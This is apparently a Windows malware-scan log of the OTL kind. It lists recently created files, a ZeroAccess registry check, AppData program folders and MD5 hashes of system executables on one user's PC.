[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/05/30 10:47:49 | 000,045,581 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error-2.png
[2014/05/30 10:46:12 | 000,040,689 | ---- | C] () -- C:\Users\Owner\Documents\mwb-error.png
[2014/05/30 10:30:32 | 000,032,512 | ---- | C] () -- C:\Windows\SysNative\drivers\hitmanpro37.sys
[2014/05/30 08:25:29 | 000,001,889 | ---- | C] () -- C:\Users\Public\Desktop\HitmanPro.lnk
[2014/05/26 13:12:20 | 000,001,049 | ---- | C] () -- C:\Users\Owner\Desktop\360 Total Security.lnk
[2014/05/26 03:21:01 | 000,000,444 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Registration3.job
[2014/05/26 03:20:49 | 000,001,197 | ---- | C] () -- C:\Users\Owner\Desktop\SpeedyPC Pro.lnk
[2014/05/26 03:20:49 | 000,000,571 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Pro_sch_A41C6437-E4AE-11E3-9423-0026188D9465.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3_triggeronce.job
[2014/05/26 03:20:49 | 000,000,464 | ---- | C] () -- C:\Windows\tasks\SpeedyPC Update Version3.job
[2014/05/26 01:39:14 | 000,001,077 | ---- | C] () -- C:\Users\Owner\Desktop\DllTool.lnk
[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task e1800e5a-718e-492b-81f8-0f6a2e27702e.job
[2014/05/26 00:31:51 | 000,000,510 | ---- | C] () -- C:\Windows\tasks\SUPERAntiSpyware Scheduled Task 21055d1e-66ba-4203-943b-3df24c22fd8c.job
[2014/05/25 20:30:41 | 000,000,841 | ---- | C] () -- C:\Users\Public\Desktop\LogMeIn Hamachi.lnk
[2014/05/25 19:55:13 | 000,723,544 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\msconfig.ini
[2014/05/25 19:24:25 | 000,000,468 | -H-- | C] () -- C:\Windows\tasks\SO.Booster-S-603818780.job
[2014/05/25 19:23:08 | 004,210,176 | ---- | C] () -- C:\Program Files (x86)\SO_x64.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | C] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:07 | 004,296,192 | ---- | C] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 15:41:24 | 000,001,123 | ---- | C] () -- C:\Users\Public\Desktop\Easy Auto Clicker.lnk
[2014/05/22 16:26:59 | 000,372,109 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\trolltest.sfx.exe
[2014/05/22 16:26:59 | 000,000,035 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\um.bat
[2014/05/22 16:26:56 | 000,426,834 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\Bypasss.exe
[2014/05/15 22:35:11 | 000,000,050 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\install.imp
[2014/05/03 16:09:37 | 000,002,046 | -H-- | C] () -- C:\Users\Owner\Documents\Default.rdp
[2014/05/03 14:37:00 | 000,001,143 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/03 14:36:59 | 000,001,155 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014/05/01 20:52:38 | 000,002,295 | ---- | C] () -- C:\Users\Owner\Desktop\Chrome App Launcher.lnk
[2014/05/01 20:20:31 | 000,001,813 | ---- | C] () -- C:\Users\Owner\Desktop\MultiBit 0.5.18.lnk
[2014/04/19 22:12:33 | 000,645,632 | ---- | C] () -- C:\Windows\SysWow64\xvidcore.dll
[2014/04/19 22:12:33 | 000,240,640 | ---- | C] () -- C:\Windows\SysWow64\xvidvfw.dll
[2014/03/29 15:50:56 | 001,816,064 | ---- | C] () -- C:\Windows\SysWow64\libmysql_e.dll
[2013/11/16 01:15:12 | 000,000,600 | ---- | C] () -- C:\Users\Owner\AppData\Local\PUTTY.RND
[2013/10/03 21:58:42 | 000,000,441 | ---- | C] () -- C:\Users\Owner\AppData\Local\UserProducts.xml
[2013/08/05 01:15:08 | 000,066,104 | ---- | C] () -- C:\Windows\SysWow64\bdmpegv.dll
[2013/08/05 01:15:06 | 000,023,080 | ---- | C] () -- C:\Windows\SysWow64\bdmjpeg.dll
[2013/05/05 14:47:47 | 000,000,064 | ---- | C] () -- C:\Windows\GPlrLanc.dat
[2013/04/10 17:49:13 | 000,281,872 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2013/04/10 17:48:50 | 000,076,888 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2013/04/10 17:48:46 | 003,130,440 | ---- | C] () -- C:\Windows\SysWow64\pbsvc_blr.exe
[2012/12/28 16:04:22 | 000,036,352 | ---- | C] () -- C:\Windows\SysWow64\xfcodec.dll
[2012/11/28 15:17:24 | 000,030,568 | ---- | C] () -- C:\Windows\MusiccityDownload.exe
[2012/11/28 15:17:18 | 000,974,848 | ---- | C] () -- C:\Windows\SysWow64\cis-2.4.dll
[2012/11/28 15:17:18 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\issacapi_bs-2.3.dll
[2012/11/28 15:17:18 | 000,065,536 | ---- | C] () -- C:\Windows\SysWow64\issacapi_pe-2.3.dll
[2012/11/28 15:17:18 | 000,057,344 | ---- | C] () -- C:\Windows\SysWow64\issacapi_se-2.3.dll
[2012/10/13 18:19:01 | 003,117,057 | ---- | C] () -- C:\Windows\SysWow64\drivers\EagleNT.sys
[2012/06/25 13:32:04 | 000,004,096 | ---- | C] () -- C:\Windows\d3dx.dat
[2012/05/25 20:58:35 | 000,000,040 | ---- | C] () -- C:\Users\Owner\jagex_cl_runescape_LIVE.dat
[2012/02/02 18:44:17 | 000,002,612 | ---- | C] () -- C:\ProgramData\repository.xml
[2011/12/29 20:39:25 | 000,000,032 | R--- | C] () -- C:\ProgramData\hash.dat
[2011/10/06 20:39:05 | 000,000,632 | RHS- | C] () -- C:\Users\Owner\ntuser.pol
[2011/08/25 03:33:32 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2011/06/08 09:32:58 | 000,001,940 | ---- | C] () -- C:\Users\Owner\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
[2011/02/01 19:26:33 | 000,000,129 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences2.dat
[2011/02/01 19:25:51 | 000,000,034 | ---- | C] () -- C:\Users\Owner\jagex_runescape_preferences.dat
[2010/12/04 12:41:22 | 230,797,822 | ---- | C] () -- C:\Program Files (x86)\Adobe Flash CS4.rar
[2010/11/06 10:11:27 | 242,254,547 | ---- | C] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar
[2010/08/06 14:55:30 | 000,002,052 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\wklnhst.dat
[2010/06/18 14:13:05 | 000,000,020 | ---- | C] () -- C:\Users\Owner\AppData\Roaming\colthy
[2010/06/08 18:36:58 | 000,025,088 | ---- | C] () -- C:\Users\Owner\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2006/07/15 11:23:29 | 000,502,126 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerv1.18.0 - Trial versionlog.dat
[2005/06/08 01:33:39 | 000,043,850 | -H-- | C] () -- C:\Users\Owner\AppData\Roaming\Ownerlog.dat
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/24 21:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/24 21:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/03/29 14:57:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ Angry_Birds
[2012/10/21 18:22:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\.minecraft
[2010/04/01 21:48:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\acccore
[2014/04/04 19:11:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\AVG2014
[2012/12/24 13:38:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Azureus
[2012/07/23 13:13:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\BANDISOFT
[2013/11/30 21:20:43 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Charles
[2011/01/01 13:18:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.comcast.callerid.13A1FA90F0FC9DC009FB0956ADD0F13F8608561B.1
[2012/01/28 18:17:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\com.w3i.FlipToast
[2012/01/28 22:29:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ConsumerSoft
[2014/05/30 04:33:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\dclogs
[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\DriverCure
[2012/02/25 22:40:02 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ExpressFiles
[2013/11/29 20:52:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\eXtremeSenses
[2010/11/11 15:36:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Farm Mania
[2012/09/22 15:14:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\FOG Downloader
[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GameMaker
[2011/09/14 13:57:56 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\GetRightToGo
[2011/07/18 08:09:41 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\go
[2014/04/13 11:55:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Gordonsys 2.0
[2013/05/05 14:48:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\InstallX, LLC
[2013/08/04 22:29:55 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\intle®
[2011/08/13 03:29:47 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iTripoli
[2012/05/05 14:41:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\iWin
[2012/07/20 12:03:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\join.me
[2014/05/26 01:39:19 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\KSafe
[2013/05/02 13:02:31 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\LaBook
[2010/07/12 18:15:18 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Ludia
[2014/05/26 05:18:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ManyCam
[2012/03/24 09:02:49 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Moonchild Productions
[2012/02/26 09:37:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Motorola
[2014/05/27 08:08:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\MultiBit
[2011/05/09 20:09:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\My Games
[2010/10/14 08:45:59 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\NCH Swift Sound
[2013/05/26 19:15:07 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Notepad++
[2013/01/18 13:36:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\npm
[2011/02/26 21:43:09 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Oberon Media
[2012/06/25 13:32:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\onverse
[2013/06/01 22:13:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\ooVoo Details
[2013/03/04 18:58:27 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Open Download Manager
[2013/07/24 01:27:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Opera
[2014/05/26 13:17:25 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Panda Security
[2012/02/02 18:47:58 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PerformerSoft
[2014/05/18 18:44:34 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PhrozenSoft
[2010/03/29 19:00:37 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PictureMover
[2010/11/11 15:41:50 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PlayFirst
[2011/05/08 17:18:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\PopCapv1000
[2012/07/01 17:03:46 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Rovio
[2013/08/03 18:57:10 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Screaming Bee
[2012/06/26 11:01:33 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SecondLife
[2010/04/04 06:12:48 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Skinux
[2014/05/27 08:08:03 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Smilebox
[2012/12/26 22:39:32 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Solveig Multimedia
[2014/05/26 03:20:57 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpeedyPC Software
[2011/05/08 15:09:42 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SpinTop
[2013/01/01 21:26:51 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SplitMediaLabs
[2014/05/26 13:21:04 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Spotify
[2013/01/07 20:00:16 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Strongvault
[2013/12/15 20:07:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Sublime Text 2
[2013/07/29 01:24:29 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\SYSTEMAX Software Development
[2014/05/30 09:13:20 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TeamViewer
[2010/08/06 14:55:35 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Template
[2014/05/26 05:19:38 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TightVNC
[2011/01/14 17:44:00 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\tmp
[2014/05/22 19:21:12 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TS3Client
[2014/04/04 19:11:08 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUp Software
[2014/05/26 05:18:21 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\TuneUpMedia
[2011/02/18 18:50:54 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\Unity
[2014/05/30 10:49:39 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\uTorrent
[2010/03/30 18:24:26 | 000,000,000 | ---D | M] -- C:\Users\Owner\AppData\Roaming\WinBatch
 
========== Purity Check ==========
 
 
 
========== Custom Scans ==========
 
< %USERPROFILE%\..|smtmp;true;true;true /FP >
 
< %temp%\smtmp\*.* /s > >
 
< MD5 for: EXPLORER.ADML  >
[2009/07/13 21:30:02 | 000,003,695 | ---- | M] () MD5=7A4C7F3CB156543113596988479CAFCE -- C:\Windows\winsxs\amd64_microsoft-windows-s..ouppolicy.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7ef5713984067904\Explorer.adml
 
< MD5 for: EXPLORER.ADMX  >
[2009/06/10 15:53:55 | 000,003,836 | ---- | M] () MD5=AD131A834808E6AFF4A3918DE05BFCF6 -- C:\Windows\winsxs\amd64_microsoft-windows-shell-grouppolicy_31bf3856ad364e35_6.1.7600.16385_none_71af9b5b0a86e6b7\Explorer.admx
 
< MD5 for: EXPLORER.EX_  >
[2002/08/29 14:00:00 | 000,351,603 | ---- | M] () MD5=2690171B51B4DBA59C02E89DB7FE6C9B -- C:\Old Computer\EXPLORER.EX_
 
< MD5 for: EXPLORER.EXE  >
[2011/02/26 01:23:14 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=0862495E0C825893DB75EF44FAEA8E93 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_adc24107935a7e25\explorer.exe
[2011/02/26 00:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe
[2009/07/13 20:14:20 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=15BC38A7492BEFE831966ADB477CF76F -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_b7fe430bc7ce3761\explorer.exe
[2011/02/26 00:51:13 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=255CF508D7CFB10E0794D6AC93280BD8 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_b8ce9756e0b786a4\explorer.exe
[2009/10/31 00:45:39 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=2626FC9755BE22F805D3CFA0CE3EE727 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_b819b343c7ba6202\explorer.exe
[2011/02/26 00:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) MD5=2AF58D15EDC06EC6FDACCE1F19482BBF -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16768_none_b816eb59c7bb4020\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\ERDNT\cache86\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe
[2011/02/25 01:19:30 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe
[2011/02/26 01:14:34 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe
[2010/11/20 07:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe
[2009/08/03 01:19:07 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=700073016DAC1C3D2E7E2CE4223334B6 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_ae84b558ac4eb41c\explorer.exe
[2007/06/13 06:26:03 | 001,033,216 | ---- | M] (Microsoft Corporation) MD5=7712DF0CDDE3A5AC89843E61CD5B3658 -- C:\Old Computer\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe
[2011/02/25 00:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe
[2009/10/31 01:34:59 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=9AAAEC8DAC27AA17B053E6352AD233AE -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16450_none_adc508f19359a007\explorer.exe
[2009/08/03 00:49:47 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=9FF6C4C91A3711C0A3B18F87B08B518D -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20500_none_b8d95faae0af7617\explorer.exe
[2010/11/20 08:24:45 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe
[2009/10/31 01:38:38 | 002,870,272 | ---- | M] (Microsoft Corporation) MD5=B8EC4BD49CE8F6FC457721BFC210B67F -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_ae46d6aeac7ca7c7\explorer.exe
[2009/08/03 00:35:50 | 002,613,248 | ---- | M] (Microsoft Corporation) MD5=B95EEB0F4E5EFBF1038A35B3351CF047 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_b853c407c78e3ba9\explorer.exe
[2009/07/13 20:39:10 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=C235A51CB740E45FFA0EBFB9BAFCDA64 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16385_none_ada998b9936d7566\explorer.exe
[2009/10/31 01:00:51 | 002,614,272 | ---- | M] (Microsoft Corporation) MD5=C76153C7ECA00FA852BB0C193378F917 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20563_none_b89b8100e0dd69c2\explorer.exe
[2011/02/26 01:26:45 | 002,870,784 | ---- | M] (Microsoft Corporation) MD5=E38899074D4951D31B4040E994DD7C8D -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.20910_none_ae79ed04ac56c4a9\explorer.exe
[2009/08/03 01:17:37 | 002,868,224 | ---- | M] (Microsoft Corporation) MD5=F170B4A061C9E026437B193B4D571799 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7600.16404_none_adff19b5932d79ae\explorer.exe
 
< MD5 for: EXPLORER.EXE.000  >
[2004/08/04 02:56:49 | 001,032,192 | ---- | M] (Microsoft Corporation) MD5=A0732187050030AE399B241436565E64 -- C:\Old Computer\explorer.exe.000
 
< MD5 for: EXPLORER.EXE.656.DMP  >
[2014/05/30 11:02:29 | 002,745,784 | ---- | M] () MD5=9A3402E40E4FD492CC2E321DBC5792B1 -- C:\Users\Owner\AppData\Local\CrashDumps\explorer.exe.656.dmp
 
< MD5 for: EXPLORER.EXE.MUI  >
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\SysWOW64\en-US\explorer.exe.mui
[2009/07/13 21:06:56 | 000,022,016 | ---- | M] (Microsoft Corporation) MD5=B9F4B1CA23D60775736059D72BA48526 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_6c3c2316c1b39396\explorer.exe.mui
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\en-US\explorer.exe.mui
[2009/07/13 21:26:48 | 000,022,016 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_61e778c48d52d19b\explorer.exe.mui
 
< MD5 for: EXPLORER.EXE-02121B1A.PF  >
[2009/09/27 22:55:45 | 000,095,436 | ---- | M] () MD5=949311AEFEE9C93B63CEC4B3B2FA976D -- C:\Old Computer\EXPLORER.EXE-02121B1A.pf
 
< MD5 for: EXPLORER.EXE-7A3328DA.PF  >
[2014/05/30 10:30:34 | 000,271,726 | ---- | M] () MD5=177EC97170AD80FDE1C3CAD39CBA149E -- C:\Windows\Prefetch\EXPLORER.EXE-7A3328DA.pf
 
< MD5 for: EXPLORER.SC_  >
[2002/08/29 14:00:00 | 000,000,181 | ---- | M] () MD5=BC5B38879C56DFBC05C8B5C43AC4D739 -- C:\Old Computer\EXPLORER.SC_
 
< MD5 for: EXPLORER.SCF  >
[2002/08/29 07:00:00 | 000,000,080 | ---- | M] () MD5=A3975A7D2C98B30A2AE010754FFB9392 -- C:\Old Computer\explorer.scf
 
< MD5 for: IEXPLORE.CH_  >
[2002/08/29 14:00:00 | 000,161,725 | ---- | M] () MD5=D94018D849BDF25E7ADB8CD46DA3DC7F -- C:\Old Computer\IEXPLORE.CH_
 
< MD5 for: IEXPLORE.CHM  >
[2004/07/17 13:40:16 | 000,204,810 | ---- | M] () MD5=60858526AAD1CC55F5F0055B8E3B66FE -- C:\Old Computer\iexplore.chm
 
< MD5 for: IEXPLORE.EX_  >
[2002/08/29 14:00:00 | 000,036,925 | ---- | M] () MD5=BAC737FDAA9B648A6EBFF76BFAEC7501 -- C:\Old Computer\IEXPLORE.EX_
 
< MD5 for: IEXPLORE.EXE  >
[2012/06/02 06:47:54 | 000,754,808 | ---- | M] (Microsoft Corporation) MD5=004640AB259C1572EBD5FB0A32F63686 -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.20553_none_0dbfc836999db0ca\iexplore.exe
[2013/01/08 20:53:45 | 000,763,424 | ---- | M] (Microsoft Corporation) MD5=0100BCF23941C83462E4A70F94C3392E -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16464_none_0d2c5bc980874648\iexplore.exe
[2012/05/17 18:21:54 | 000,748,664 | ---- | M] (Microsoft Corporation) MD5=0129BB16161C2FD9A6B19111AB047198 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_9.4.8112.16446_none_1798a687b4d6030f\iexplore.exe
[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Program Files (x86)\Internet Explorer\iexplore.exe
[2014/03/07 20:59:00 | 000,811,728 | ---- | M] (Microsoft Corporation) MD5=0667ED9F8E905E1F73DB60ACCEDCBCA7 -- C:\Windows\winsxs\wow64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.17041_none_858ffb5bf711c81f\iexplore.exe
[2013/11/20 04:04:34 | 000,804,560 | ---- | M] (Microsoft Corporation) MD5=0685765C0CBE095BA0C6C8790BAE21EF -- C:\Windows\winsxs\amd64_microsoft-windows-i..etexplorer-optional_31bf3856ad364e35_11.2.9600.16428_none_7b0d6f67c2d3f97a\iexplore.exe
